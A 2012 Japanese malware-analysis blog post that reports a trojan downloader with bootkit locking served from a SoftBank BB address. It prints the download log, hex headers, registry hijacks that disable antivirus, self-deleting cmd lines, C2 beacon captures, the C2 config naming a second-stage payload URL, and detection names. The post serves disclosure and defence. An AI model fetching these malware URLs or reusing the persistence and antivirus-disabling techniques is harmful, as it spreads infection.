火曜日, 11月 06, 2012

#OCJP-080: 結構酷いトロイダウンローダー+BOOTKITロック中国マルウェアをSoftBankBBネットワークに発見!

126.15.181.20の#BOOTKITウェブサーバにマルウェアを発見しました。
サーバー:126.15.181.20/ NetBox Version 2.8 Build 4128
ポート:8080
URL: hxxp://126.15.181.20/8080/stup.exe

本件はトロイですので、感染されたら他のマルウェアをダウンロードされます。
そして、パソコンをBOOTKITのフック方法でパスワード・ロックされます。
危険ですので早めに削除して下さい。

現在もダウンロードが出来ている証拠↓
Tue Nov  6 14:37:00 JST 2012
--14:46:11--  hxxp://126.15.181.20/8080/stup.exe
           => `stup.exe'
HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Tue, 06 Nov 2012 06:26:11 GMT
Connection: Close
Content-Type: application/x-msdownload
Last-Modified: Sun, 30 Sep 2012 12:47:12 GMT
Content-Length: 56757
Connecting to 126.15.181.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56,757 (55K) [application/x-msdownload]
100%[===================================> ] 56,757       242.76K/s
14:46:12 (242.61 KB/s) - `stup.exe' saved [56757/56757]
MD5: 57415a5a61c5b38ed9a1cd8c15a7a4b0

■ バイナリー調査↓

//見た目↓


//ファストブロック
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 B0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   5D 65 FD C8 19 04 93 9B 19 04 93 9B 19 04 93 9B    ]e..............
0090   97 1B 80 9B 11 04 93 9B E5 24 81 9B 18 04 93 9B    .........$......
00A0   52 69 63 68 19 04 93 9B 00 00 00 00 00 00 00 00    Rich............
00B0   50 45 00 00 4C 01 02 00 BE 82 0E 50 00 00 00 00    PE..L......P....
00C0   00 00 00 00 E0 00 0F 01 0B 01 05 0C 00 00 00 00    ................

//Packer:
Ding Boy's PE-lock Phantasm v1.0 /v1.1
0x00004D   0x40004D  !This program cannot be run in DOS mode.
0x0001A8   0x4001A8  DINGBOY
0x0001D0   0x4001D0  DINGBOY

//ニセマルウェア/ウイルスアラート↓
0x009BCC   0x4279CC  Error:
0x009BD3   0x4279D3  File damaged or infected by virus!
0x009BF6   0x4279F6  Could not load %s dynamic link library!
0x009C1E   0x427A1E  Could not find %s export inside %s dynamic link library!
0x009C57   0x427A57  Could not find ordinal export:%08X inside %s dynamic link library!

//詐欺/ロック・パスワードエラー↓
0x009CBA   0x427ABA  Info:
0x009CC0   0x427AC0  Warning: Password you have entered is not vaild!
0x009CF1   0x427AF1  Do you want to cancel the file download?
0x009D1B   0x427B1B  Warning: Application can not run without nessesary .dll files!
0x009D5A   0x427B5A  Could not download nessesary .dll file(s) because:
0x009D90   0x427B90  1) You are not connected to internet
0x009DB6   0x427BB6  2) File can not be found on remote server
0x009DE1   0x427BE1  3) Your firewall has blocked access to internet
0x009E14   0x427C14  Since application can not run without nessesary .dll files, program will now close!
0x009E68   0x427C68  Downloaded .dll file is corrupt and can not be loaded!
0x009EA0   0x427CA0  Please restart this aplication so the file can be downloaded again!

//インターネットからダウンロード↓
0x00A0DA   0x427EDA  urlmon.dll
0x00A13D   0x427F3D  WebSite: %s
0x00A149   0x427F49  Downloading: %s
0x00A159   0x427F59  Completed: %d percent
0x00A16F   0x427F6F  File: %d/%d

0x00D5BD   0x40D5BD  urlmon.dll
0x00D5C9   0x40D5C9  URLDownloadToFileA
0x00D5DD   0x40D5DD  biaoji
0x00D5E5   0x40D5E5  localfile
0x00D5F1   0x40D5F1  count

//レジストリーのセキュリティーをバイパス↓
0x00D5FD   0x40D5FD  DisableRegistryTools
0x00D615   0x40D615  Software\Microsoft\Windows\CurrentVersion\Policies\System
0x00D659   0x40D659  Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

■ 行動分析調査/マルウェア動き調査↓

証拠↓


保存されたマルウェアファイル↓
\\.\PHYSICALDRIVE0 
C:\DOCUME~1\~1\LOCALS~1\Temp\DogKiller.sys 
C:\WINDOWS\system32\down.txt 
C:\DOCUME~1\~1\LOCALS~1\Temp\sv2.tmp 
C:\WINDOWS\system32\sa.exe 
\\.\PIPE\lsarpc 
C:\WINDOWS\IRIMGV3.bmp 

移動されたマルウェアファイル↓
C:\86d2682cd6e5e636d6e9ecab0543cb8e2b4960879ea8444b3017da7a29cb5922 ⇒ null(削除) //←マルウェアファイル 
C:\86d2682cd6e5e636d6e9ecab0543cb8e2b4960879ea8444b3017da7a29cb5922 ⇒ C:\WINDOWS\system32\scvhostv.exe 
C:\WINDOWS\system32\ws2help.dll ⇒ C:\WINDOWS\system32\ws2help.dll.XOM.tmp 
C:\WINDOWS\IRIMGV3.bmp ⇒ C:\WINDOWS\system32\ws2help.dll 
C:\WINDOWS\system32\ws2help.dll ⇒ C:\WINDOWS\system32\ws2helpXP.dll 

削除されたマルウェアファイル↓
C:\DOCUME~1\~1\LOCALS~1\Temp\DogKiller.sys //マルウェアドライバー
C:\WINDOWS\system32\dia3.ini //マルウェア設定ファイル
*)さらに直ぐに削除されます↑そして本関係ファイル@レジストリーも↓
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DogKiller\Enum 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DogKiller\Security 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DogKiller 

マルウェアコマンド実行一覧↓
C:\DOCUME~1\~1\LOCALS~1\Temp\sv2.tmp
C:\WINDOWS\system32\sa.exe
cmd /cfor /l %a in (0,0,0) do if exist C:\DOCUME~1\~1\LOCALS~1\Temp\sv2.exe" (del/a/f "C:\DOCUME~1\~1\LOCALS~1\Temp\sv2.exe") else exit"
C:\WINDOWS\system32\cmd.exe /c del C:\WINDOWS\system32\sa.exe""

実行されたマルウェアサービス情報↓
MACHINE:  localhost DATABASE: SERVICES_ACTIVE_DATABASE
DogKiller
RASMAN (successful)

【重要!】フック↓
TYPE:   WH_MSGFILTER
METHOD: SetWindowsHook

マルウェアが変更されたレジストリー↓
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AYAgent.aye\Debugger
種類  REG_SZ VALUE: svchost.exe
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AYServiceNt.aye\Debugger
種類  REG_SZ VALUE: svchost.exe 
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ALYac.aye\Debugger
種類  REG_SZ VALUE: svchost.exe 
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AYUpdate.aye\Debugger
種類  REG_SZ VALUE: svchost.exe 
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sgsvc.exe\Debugger
種類  REG_SZ VALUE: svchost.exe 
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3LTray.exe\Debugger
種類  REG_SZ VALUE: svchost.exe 
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3LSvc.exe\Debugger
種類  REG_SZ VALUE: svchost.exe 

//ニセビデオAPP登録…
キー   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonVideo
種類  REG_SZ VALUE: C:\Documents and Settings\All Users\Documents\My Videos

//インターネット設定を変更…
キー   HKEY_USERS\S-1-5-21-1275210071-920026266-1060284298-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
種類  REG_DWORD VALUE: 1 
キー   HKEY_USERS\S-1-5-21-1275210071-920026266-1060284298-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
種類  REG_DWORD VALUE: 0 
キー   HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
種類  REG_DWORD VALUE: 0 
キー   HKEY_USERS\S-1-5-21-1275210071-920026266-1060284298-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
種類  REG_BINARY VALUE:  
キー   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass
種類  REG_DWORD VALUE: 1 
キー   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName
種類  REG_DWORD VALUE: 1 
キー   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet
種類  REG_DWORD VALUE: 1 
キー   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_DLLs
種類  REG_SZ VALUE: ws2help.dll 

■ マルウェアのネットワーク行動調査↓

感染されたPCからリモートIP(126.15.181.20)にネットワークHANDSHAKE繋ぐ動きを確認しました

(感染されたPC)⇒126.15.181.20 TCP ams > http [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 30 23 06 40 00 80 06  dc a1 c0 a8 07 54 7e 0f   .0#.@... .....T~.
0020  b5 14 04 0d 00 50 5c 42  6e 46 00 00 00 00 70 02   .....P\B nF....p.
0030  40 00 79 19 00 00 02 04  05 b4 01 01 04 02         @.y..... ......  

126.15.181.20から⇒(感染されたPC)へ TCP http > ams [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1412 SACK_PERM=1
0000  00 12 f0 e9 3e 3e 00 a0  c9 22 b0 ee 08 00 45 00   ....>>.. ."....E.
0010  00 30 3d d3 00 00 36 06  4b d5 7e 0f b5 14 c0 a8   .0=...6. K.~.....
0020  07 54 00 50 04 0d e9 4c  7e 55 5c 42 6e 47 70 12   .T.P...L ~U\BnGp.
0030  ff ff 51 96 00 00 02 04  05 84 01 01 04 02         ..Q..... ......  

(感染されたPC)から⇒126.15.181.20 TCP ams > http [ACK] Seq=1 Ack=1 Win=16944 Len=0
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 28 23 07 40 00 80 06  dc a8 c0 a8 07 54 7e 0f   .(#.@... .....T~.
0020  b5 14 04 0d 00 50 5c 42  6e 47 e9 4c 7e 56 50 10   .....P\B nG.L~VP.
0030  42 30 3b fa 00 00                                  B0;...

(感染されたPC)から⇒126.15.181.20へHTTP GET /clcount/count.asp?mac=0012f0e93e3e&ver=2011112601 HTTP/1.1コマンドを送信しました
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 b0 23 08 40 00 80 06  dc 1f c0 a8 07 54 7e 0f   ..#.@... .....T~.
0020  b5 14 04 0d 00 50 5c 42  6e 47 e9 4c 7e 56 50 18   .....P\B nG.L~VP.
0030  42 30 9c a4 00 00 47 45  54 20 2f 63 6c 63 6f 75   B0....GE T /clcou
0040  6e 74 2f 63 6f 75 6e 74  2e 61 73 70 3f 6d 61 63   nt/count .asp?mac
0050  3d 30 30 31 32 66 30 65  39 33 65 33 65 26 76 65   =0012f0e 93e3e&ve
0060  72 3d 32 30 31 31 31 31  32 36 30 31 20 48 54 54   r=201111 2601 HTT
0070  50 2f 31 2e 31 0d 0a 55  73 65 72 2d 41 67 65 6e   P/1.1..U ser-Agen
0080  74 3a 20 47 4f 4f 47 4c  45 0d 0a 48 6f 73 74 3a   t: GOOGL E..Host:
0090  20 69 6e 66 6f 6a 73 65  77 66 67 35 2e 69 6e 66    infojse wfg5.inf
00a0  6f 0d 0a 43 61 63 68 65  2d 43 6f 6e 74 72 6f 6c   o..Cache -Control
00b0  3a 20 6e 6f 2d 63 61 63  68 65 0d 0a 0d 0a         : no-cac he....

その流れのコミュニケーションは下記となります↓
【送信】GET /clcount/count.asp?mac=0012f0e93e3e&ver=2011112601 HTTP/1.1
User-Agent: GOOGLE
Host: infojsewfg5.info
Cache-Control: no-cache

【回答】HTTP/1.1 404 File Not Found
Server: NetBox Version 2.8 Build 4128
Date: Tue, 06 Nov 2012 06:53:56 GMT
Connection: Keep-Alive
Content-Length: 212
Content-Type: text/html

そして…本格的なマルウェアのダウンロード…
<html><head><title>404 File Not Found</title></head>
<body><h>
404 File Not Found</h1>
<hr>
<small>Host by <a href="hxxp://www.netbox.cn" target="_blank">NetBox Version 2.8 Build 4128</a></small>
</body></html>

【送信】GET /down.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: infojsewfg5.info
Connection: Keep-Alive

【回答】HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Tue, 06 Nov 2012 06:53:56 GMT
Connection: Keep-Alive
Content-Type: text/plain
Last-Modified: Sun, 04 Nov 2012 01:57:41 GMT
Content-Length: 213

[update]
ver=2011112601
url=hxxp://126.15.181.20/8080/stup.exe
updatetimer=2

[file].
isfile=1
url2=hxxp://216.18.211.170:6231/1.exe
biaoji2=test2
xiazaiyanshi2=16
count=2
isweb=0
web=http://127.0.0.1/

ネットワーク調査の証拠↓


↑上記の動きを見たら下記のサマリーとなります↓
1. 本マルウェアは126.15.181.20にHTTPでバックドアコミュニケーションを行われます。
2. MACADRESSと日付けを送信し126.15.181.20の別のホスト名infojsewfg5.infoに投げます。
3. infojsewfg5.infoからのDOWN.TXTをダウンロードされます、下記のように↓
--16:25:09--  hxxp://infojsewfg5.info/down.txt
           => `down.txt'
Resolving infojsewfg5.info... 126.15.181.20
Connecting to infojsewfg5.info|126.15.181.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
16:25:09 (1.29 KB/s) - `down.txt' saved [213/213]

ダウンロードされたファイルの中身はやはりCNCにあるマルウェア情報↓
$ cat down.txt
[update]
ver=2011112601
url=hxxp://126.15.181.20/8080/stup.exe
updatetimer=2
[file]
isfile=1
url2=hxxp://216.18.211.170:6231/1.exe
biaoji2=test2
xiazaiyanshi2=16
count=2
isweb=0
web=hxxp://127.0.0.1/

4. down.txtの中に中国マルウェアのURLが書いてありますので、本マルウェアはそのURLを実行し
ダウンロードされます、下記のように↓
--17:55:36--  hxxp://216.18.211.170:6231/1.exe
           => `1.exe'
Connecting to 216.18.211.170:6231... connected.
HTTP request sent, awaiting response... 200 OK
Length: 147,456 (144K) [application/octet-stream]
17:55:37 (139.94 KB/s) - `1.exe' saved [147456/147456]

見た目↓


↑ダウンロードされたマルウェアを実行されたら下記のコマンドを走ってしまい↓
C:\WINDOWS\system32\sa.exe
cmd /cfor /l %a in (0,0,0) do if exist C:\\1cb2e1d2ca114f92892be6d4199f5f9adf7dec92bf216a6a3985bf1f2dd99351.exe" (del/a/f "C:\\1cb2e1d2ca114f92892be6d4199f5f9adf7dec92bf216a6a3985bf1f2dd99351.exe") else exit"
C:\WINDOWS\system32\cmd.exe /c del C:\WINDOWS\system32\sa.exe""

下記の保存されたマルウェアファイルを↓
C:\WINDOWS\system32\sa.exe 
C:\WINDOWS\IRIMGV3.bmp 

Windowsシステムドライバーとして実行してしまいます↓
C:\WINDOWS\system32\ws2help.dll
C:\WINDOWS\system32\ws2helpXP.dll 

5. それで次パソコンを起動した時にロックが行われております。
結構酷い仕組みですね。。(>_<);;

マルウェア名前/ウイルストータル調査↓
SHA1: 4471b19ea89b6f176f36765b230cd7995bd123a5 MD5: 57415a5a61c5b38ed9a1cd8c15a7a4b0 File size: 55.4 KB ( 56757 bytes ) File name: stup.exe.bin File Type: Win32 EXE Tags: dingboy peexe rlpack Detection: 33 / 44 Date: 2012-11-06 02:18:52 UTC URL: [CLICK]

マルウェア名前↓
MicroWorld-eScan         : Gen:Trojan.Heur.PT.diYabOQLjDe
CAT-QuickHeal            : Trojan.Popureb
McAfee                   : Artemis!57415A5A61C5
K7AntiVirus              : Unwanted-Program
F-Prot                   : W32/RLPacked.A.gen!Eldorado
Symantec                 : Trojan.ADH
Norman                   : W32/Troj_Generic.ETJCA
ByteHero                 : Virus.Win32.Heur.c
TrendMicro-HouseCall     : TROJ_GEN.RCBCDJ5
Avast                    : Win32:Malware-gen
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Gen:Trojan.Heur.PT.diYabOQLjDe
Agnitum                  : Packed/RLPack
Emsisoft                 : Trojan.Win32.AMN (A)
Comodo                   : Heur.Suspicious
F-Secure                 : Gen:Trojan.Heur.PT.diYabOQLjDe
DrWeb                    : Trojan.AVKill.21063
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/Crypt.XPACK.Gen
TrendMicro               : TROJ_GEN.RCBCDJ5
McAfee-GW-Edition        : Heuristic.LooksLike.Win32.Suspicious.F
Sophos                   : Sus/ComPack-F
ESET-NOD32               : probably a variant of Win32/Rootkit.Agent.NFF
Kingsoft                 : Win32.Troj.Undef.(kcloud)
Microsoft                : Trojan:Win32/Popureb.C
GData                    : Gen:Trojan.Heur.PT.diYabOQLjDe
AhnLab-V3                : Downloader/Win32.Small
VBA32                    : BScope.Trojan.SvcHorse.01643
PCTools                  : Trojan.ADH
Rising                   : Trojan.Isnev!2D88
Ikarus                   : Backdoor.Rbot
AVG                      : Win32/Patched.DJ
Panda                    : Trj/CI.A

さらにダウンロードされたマルウェアは↓

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   8F 8A F9 DB CB EB 97 88 CB EB 97 88 CB EB 97 88    ................
0090   48 F7 99 88 CA EB 97 88 A2 F4 9E 88 CA EB 97 88    H...............
00A0   22 F4 9A 88 CA EB 97 88 52 69 63 68 CB EB 97 88    ".......Rich....
00B0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00    ........PE..L...

ヘッターを見たら↓
Microsoft Visual Basic v5.0 - v6.0
Entry Point at 0x12a0
Virtual Address is 0x4012a0
Sections:
.text 0x1000 0x19a4 8192
.data 0x3000 0x9ec 4096
.rsrc 0x4000 0x1fd0c 131072

ウイルストータル↓
MD5: 9425b2fbc702bddf7dbaec25e867f99e File size: 144.0 KB ( 147456 bytes ) File name: 1.exe File type: Win32 EXE Tags: peexe Detection: 31 / 44 Date: 2012-11-06 06:02:04 UTC URL: [CLICK]

マルウェア名前↓
MicroWorld-eScan         : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb
McAfee                   : Artemis!9425B2FBC702
K7AntiVirus              : Riskware
F-Prot                   : W32/OnlineGames.HV.gen!Eldorado
TotalDefense             : Win32/HostBlock.GD
TrendMicro-HouseCall     : Mal_OLGM-6
Avast                    : Win32:OnLineGames-GHA [Trj]
Kaspersky                : Trojan-Dropper.Win32.VB.mrb
BitDefender              : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb
Agnitum                  : Rootkit.Agent!WUecpT8Vh0E
Emsisoft                 : Trojan.Dropper.Win32.VB.AMN (A)
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
F-Secure                 : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb
DrWeb                    : Trojan.MulDrop4.7078
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/Spy.Gen2
TrendMicro               : Mal_OLGM-6
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Suspicious-BAY.K
Sophos                   : Mal/Behav-363
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QDQ
Kingsoft                 : Win32.Troj.VB.(kcloud)
Microsoft                : PWS:Win32/OnLineGames.LH
ViRobot                  : Dropper.Agent.147456.G
GData                    : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb
Commtouch                : W32/OnlineGames.HV.gen!Eldorado
AhnLab-V3                : ASD.Prevention
Rising                   : Trojan.PSW.OnLineGames!452E
Ikarus                   : Trojan-PWS.OnlineGames
Fortinet                 : W32/VB.MRB!tr
AVG                      : Hider.RLD
Panda                    : Trj/CI.A

■ 感染調査|感染されたサーバのネットワーク情報↓

//逆引きIP検索↓
softbank126015181020.bbtec.net

//ネットワーク情報↓
inetnum:        126.0.0.0 - 126.255.255.255
netname:        BBTEC
descr:          Japan Nation-wide Network of Softbank BB Corp.
country:        JP
admin-c:        SA421-AP
tech-c:         SA421-AP

role:           SoftbankBB ABUSE
address:        Tokyo Shiodome bldg., 1-9-1, Higashi-Shimbashi, Minatoku,Tokyo
country:        JP
phone:          +81-3-6688-5120
e-mail:         stsuruma@bb.softbank.co.jp
remarks:        Please send spam report,virus alart
remarks:        or any other abuse report
remarks:        to  abuse@bbtec.net


----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック|Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック

0 件のコメント:

コメントを投稿